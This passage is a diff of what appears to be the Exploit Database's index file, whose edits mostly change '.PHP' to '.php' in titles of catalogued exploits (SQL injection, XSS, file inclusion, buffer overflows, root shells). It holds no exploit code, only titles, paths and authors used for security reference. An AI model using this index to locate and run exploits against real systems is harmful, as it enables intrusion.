Vulnerability",2007-05-03,"ilker Kandemir",php,webapps,0 +29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.php Remote File Include Vulnerability",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability",2007-05-03,"Tim Brown",hardware,remote,0 29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0 -30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0 +30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.php SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service Vulnerability",2007-05-04,Jean-Sébastien,windows,dos,0 29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local Vulnerability",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0 -29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0 +29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.php Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution Vulnerability",2007-05-07,"Arnaud Giersch",linux,local,0 -29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.PHP SQL Injection Vulnerability",2007-05-07,Bulan,php,webapps,0 +29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.php SQL Injection Vulnerability",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 PID Parameter SQL Injection Vulnerability",2007-05-07,"ilker Kandemir",asp,webapps,0 @@ -27051,9 +27052,9 @@ id,file,description,date,author,platform,type,port 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0 -29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0 +29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.php Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0 -29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0 +29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.php Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0 29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -27100,40 +27101,40 @@ id,file,description,date,author,platform,type,port 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability",2013-12-06,"aceeeeeeeer .",php,webapps,0 -30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 -30065,platforms/php/webapps/30065.html,"GaliX 2.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 +30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 +30065,platforms/php/webapps/30065.html,"GaliX 2.0 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injection Vulnerabilities",2007-05-21,"Jesper Jurcenoks",php,webapps,0 30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal Vulnerability",2007-05-22,"Jesus Roncero",windows,remote,0 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 Login Variable Cross-Site Scripting Vulnerability",2007-05-22,"Jesper Jurcenoks",php,webapps,0 30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 DartZipLite.DLL ActiveX Control Buffer Overflow Vulnerability",2007-05-22,shinnai,windows,remote,0 -30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 Index.PHP HTML Injection Vulnerability",2007-05-22,"John Martinelli",php,webapps,0 +30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 Index.php HTML Injection Vulnerability",2007-05-22,"John Martinelli",php,webapps,0 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 Parser_Path Remote File Include Vulnerability",2007-05-22,the_Edit0r,php,webapps,0 30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0 -30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 ShowOwn.PHP Cross-Site Scripting Vulnerability",2007-05-22,CorryL,php,webapps,0 +30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 ShowOwn.php Cross-Site Scripting Vulnerability",2007-05-22,CorryL,php,webapps,0 30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability",2007-05-07,"Gregory Beaver",linux,remote,0 -30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.PHP Cross-Site Scripting Vulnerability",2007-05-23,"Michal Majchrowicz",php,webapps,0 -30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-05-23,vagrant,php,webapps,0 +30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.php Cross-Site Scripting Vulnerability",2007-05-23,"Michal Majchrowicz",php,webapps,0 +30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.php Cross-Site Scripting Vulnerability",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting Vulnerability",2007-05-23,"Marc Ruef",asp,webapps,0 30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure Vulnerability",2007-05-23,"Gareth Heyes",multiple,remote,0 -30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 Rating.PHP Cross-Site Scripting Vulnerability",2007-05-23,"Janek Vind",php,webapps,0 +30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 Rating.php Cross-Site Scripting Vulnerability",2007-05-23,"Janek Vind",php,webapps,0 30080,platforms/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service Vulnerability",2007-05-24,"Bart Oldeman",linux,dos,0 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 News.ASP Cross-Site Scripting Vulnerability",2007-05-24,vagrant,php,webapps,0 -30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.PHP Cross-Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0 +30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.php Cross-Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 -30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.PHP Cross-Site Scripting Vulnerability",2007-05-25,newbinaryfile,php,webapps,0 +30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.php Cross-Site Scripting Vulnerability",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass Vulnerability",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection Vulnerability",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component Remote Denial of Service Vulnerability",2007-05-28,shinnai,linux,dos,0 -30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 News.PHP SQL Injection Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 +30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 News.php SQL Injection Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30096,platforms/osx/local/30096.txt,"Apple Mac OS X <= 10.4.9 - VPND Local Format String Vulnerability",2007-05-29,"Chris Anley",osx,local,0 30097,platforms/php/webapps/30097.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php selected_theme Parameter XSS",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php Multiple Variable Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 NewsID Parameter SQL Injection Vulnerability",2007-05-28,"laurent gaffie",php,webapps,0 -30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability",2007-05-29,"laurent gaffie",php,webapps,0 -30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.PHP Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0 -30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.PHP SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0 +30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.php SQL Injection Vulnerability",2007-05-29,"laurent gaffie",php,webapps,0 +30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.php Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0 +30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.php SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0 30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,dos,0 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0 @@ -27145,17 +27146,17 @@ id,file,description,date,author,platform,type,port 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0 +30217,platforms/php/webapps/30217.txt,"Wrapper.php for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0 30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 Filename Parse Error Information Disclosure Vulnerability",2007-06-21,"Shay Priel",multiple,remote,0 -30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 Index.PHP Local File Include Vulnerability",2007-06-21,r0t,php,webapps,0 -30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 Index.PHP Multiple SQL Injection Vulnerabilities",2007-06-21,r0t,php,webapps,0 +30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 Index.php Local File Include Vulnerability",2007-06-21,r0t,php,webapps,0 +30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 Index.php Multiple SQL Injection Vulnerabilities",2007-06-21,r0t,php,webapps,0 30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 Post.MSCGI Cross-Site Scripting Vulnerability",2007-01-02,Prili,multiple,remote,0 30223,platforms/php/webapps/30223.txt,"NetClassifieds <= 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps,0 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0 30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 -30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.PHP Remote File Include Vulnerability",2007-06-22,spymeta,php,webapps,0 +30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.php Remote File Include Vulnerability",2007-06-22,spymeta,php,webapps,0 30228,platforms/osx/remote/30228.txt,"Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability",2007-06-22,"Richard Moore",osx,remote,0 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 Filename Parse Error Information Disclosure Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection Vulnerability",2007-06-25,netVigilance,php,webapps,0 @@ -27171,19 +27172,19 @@ id,file,description,date,author,platform,type,port 30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 -30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.PHP Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0 +30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.php Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0 30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x ICity Parameter SQL Injection Vulnerability",2006-12-02,"Aria-Security Team",asp,webapps,0 30251,platforms/linux/dos/30251.c,"GD Graphics Library <= 2.0.34 (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,anonymous,linux,dos,0 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 Large String Denial of Service Vulnerability",2007-06-27,35c666,windows,dos,0 -30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 Open.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 +30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 Open.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow Vulnerability",2007-06-28,"Jerome Athias",windows,dos,0 30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server Secondary Login Page Cross-Site Scripting Vulnerability",2007-06-28,"Kaushal Desai",multiple,remote,0 30257,platforms/windows/remote/30257.html,"HP Instant Support ActiveX Control Driver Check Buffer Overflow Vulnerability",2007-04-01,"John Heasman",windows,remote,0 -30258,platforms/php/webapps/30258.txt,"LightBlog <= 5 Add_Comment.PHP Cross-Site Scripting Vulnerability",2007-07-02,Serapis.net,php,webapps,0 +30258,platforms/php/webapps/30258.txt,"LightBlog <= 5 Add_Comment.php Cross-Site Scripting Vulnerability",2007-07-02,Serapis.net,php,webapps,0 30259,platforms/php/webapps/30259.txt,"Claroline <= 1.8.3 - $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 -30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks Remote Code Execution Vulnerability",2007-07-02,"Cody Brocious",cgi,webapps,0 -30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 Index.PHP Cross-Site Scripting Vulnerability",2007-07-02,MustLive,php,webapps,0 +30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution Vulnerability",2007-07-02,"Cody Brocious",cgi,webapps,0 +30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 Index.php Cross-Site Scripting Vulnerability",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS Information Disclosure Vulnerability",2007-07-02,durito,php,webapps,0 30263,platforms/cgi/webapps/30263.txt,"Oliver Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 @@ -27198,7 +27199,7 @@ id,file,description,date,author,platform,type,port 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 -30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0 +30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.php Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAms Cross-Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution Vulnerability",2007-07-05,"Steve Kemp",linux,local,0 @@ -27213,7 +27214,7 @@ id,file,description,date,author,platform,type,port 30291,platforms/linux/remote/30291.txt,"Multiple Vendors - RAR Handling Remote Null Pointer Dereference Vulnerability",2007-07-11,"Metaeye Security Group",linux,remote,0 30292,platforms/multiple/remote/30292.pl,"Apple QuickTime <= 7.1.5 Information Disclosure and Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting Vulnerability",2007-07-12,"Hanno Boeck",php,webapps,0 -30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 Index.PHP SQL Injection Vulnerability",2007-07-12,Keniobats,php,webapps,0 +30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 Index.php SQL Injection Vulnerability",2007-07-12,Keniobats,php,webapps,0 30295,platforms/multiple/local/30295.sql,"Oracle Database SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 Picture_Real_Edit.ASP SQL Injection Vulnerability",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 errors/rights.asp msg Parameter XSS",2007-07-13,"RedTeam Pentesting",asp,webapps,0 @@ -27230,16 +27231,16 @@ id,file,description,date,author,platform,type,port 30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 topic.php s Parameter XSS",2007-07-25,Lostmon,php,webapps,0 30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 -30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.PHP Directory Traversal Vulnerability",2007-07-25,Lostmon,php,webapps,0 +30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.php Directory Traversal Vulnerability",2007-07-25,Lostmon,php,webapps,0 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection Vulnerability",2007-07-26,"Aria-Security Team",php,webapps,0 -30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 +30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.php Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 -30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 +30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 showuser who Parameter XSS",2007-07-14,"Christopher Schwardt",php,webapps,0 -30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR TakeProfEdit.PHP HTML Injection Vulnerability",2007-07-16,PescaoDeth,asp,webapps,0 +30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR TakeProfEdit.php HTML Injection Vulnerability",2007-07-16,PescaoDeth,asp,webapps,0 30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger <= 8.1 Address Book Remote Buffer Overflow Vulnerabilitiy",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0 30315,platforms/windows/remote/30315.txt,"Trillian 3.1.6.0 URI Handler Remote Code Execution Vulnerabilities",2007-07-16,"Nate Mcfeters",windows,remote,0 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 Philboard_forum.ASP SQL Injection Vulnerability",2007-07-17,GeFORC3,asp,webapps,0 @@ -27258,9 +27259,9 @@ id,file,description,date,author,platform,type,port 30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti Index.ASP Cross-Site Scripting Vulnerability",2007-07-23,GeFORC3,asp,webapps,0 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30332,platforms/asp/webapps/30332.txt,"Image Racer SearchResults.ASP SQL Injection Vulnerability",2007-07-23,"Aria-Security Team",asp,webapps,0 -30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 Function_List.PHP Local File Include Vulnerability",2007-07-23,You_You,php,webapps,0 +30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 Function_List.php Local File Include Vulnerability",2007-07-23,You_You,php,webapps,0 30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 W1L3D4_Aramasonuc.ASP Cross-Site Scripting Vulnerability",2007-07-25,GeFORC3,asp,webapps,0 -30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 +30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay Vulnerability",2007-07-24,"Adrian Pastor",php,webapps,0 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting Vulnerability",2007-07-24,"Aria-Security Team",php,webapps,0 30381,platforms/windows/remote/30381.txt,"Multiple Browser URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 @@ -27272,7 +27273,7 @@ id,file,description,date,author,platform,type,port 30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,metasploit,linux,remote,443 30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box",2013-12-16,"Matt O'Connor",hardware,webapps,0 -30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 +30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.php Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Stored XSS Vulnerability",2013-12-16,"null pointer",php,webapps,0 30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 30357,platforms/php/webapps/30357.txt,"iScripts MultiCart <= 2.4 - Persistent XSS / CSRF / XSS+CSRF Mass Accounts takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0 @@ -27304,7 +27305,7 @@ id,file,description,date,author,platform,type,port 31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 